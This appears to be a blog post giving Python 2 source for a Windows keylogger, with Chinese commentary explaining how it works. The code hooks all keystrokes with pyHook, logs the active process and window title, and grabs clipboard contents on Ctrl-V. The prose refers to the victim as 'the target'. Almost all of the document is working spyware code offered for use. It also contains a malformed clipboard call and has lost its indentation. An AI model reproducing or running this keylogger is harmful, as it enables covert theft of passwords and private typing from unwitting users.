redboy

from ctypes import *
import pythoncom
import pyHook
import win32clipboard

user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None

def get_current_process():
hwnd = user32.GetForegroundWindow()#获得前台窗口的句柄
#获得进程ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd,byref(pid))
#保存当前的进程ID
process_id ="%d" % pid.value
#申请内存
executable = create_string_buffer("\x00" * 512)
h_process = kernel32.OpenProcess(0x400 | 0x10,False, pid)
psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
#读取窗口标题
window_title = create_string_buffer("\x00" *512)
length = user32.GetWindowTextA(hwnd, byref(window_title),512)
#输出进程相关的信息
print
print "[ PID: %s - %s - %s ]" %(process_id,executable.value,window_title.value)
print
#关闭句柄
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)

def KeyStroke(event):
global current_window
#检查目标是否切换了窗口
if event.WindowName != current_window:
current_window =event.WindowName
get_current_process()

#检测按键是否为常规按键（非组合键等）
if event.Ascii > 32 and event.Ascii < 127:
print chr(event.Ascii),
else:
#如果是输入为[Ctrl-V]，则获得剪切板的内容
if event.Key =="V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboard.GetClipboardData()
win32clipboard.CloseClipboard()

print "[Paste] - %s" % (pasted_value),

else:
print "[%s]" % event.Key
#返回直到下一个钩子事件被触发
return True
#创建和注册钩子函数管理器
k1 =pyHook.HookManager()
k1.KeyDown =KeyStroke
#注册键盘记录的钩子，然后永久执行
k1.HookKeyboard()
pythoncom.PumpMessages()

GetForeGroundWindow函数，他返回了目标桌面上当前活动窗口的句柄，然后，我们将句柄作为参数调用了GetWindowThreadProcessId函数，他返回的是窗口对应的进程ID。之后，我们打开进程，利用返回的进程句柄，我们获得了进程对应的可执行文件的名字。通过调用GetWindowTextA函数，我们获得了窗口标题栏中显示的文本字符。最后，我们将所有的信息通过一种醒目的方式进行了输出，你可以直观地看到键盘记录所对应的进程和窗口。

我们定义了PyHook的HookManager管理器，然后将我们自定义的回调函数KeyStroke与KeyDown事件进行了绑定。之后，我们通过PyHook钩住了所有的按键事件，然后继续消息循环。当目标按下键盘上的一个键时，我们的KeyStroke函数就会被调用，他唯一的一个参数是触发这个事件的对象。

还检查是否使用了剪贴板，会自动的提取剪贴板中的内容。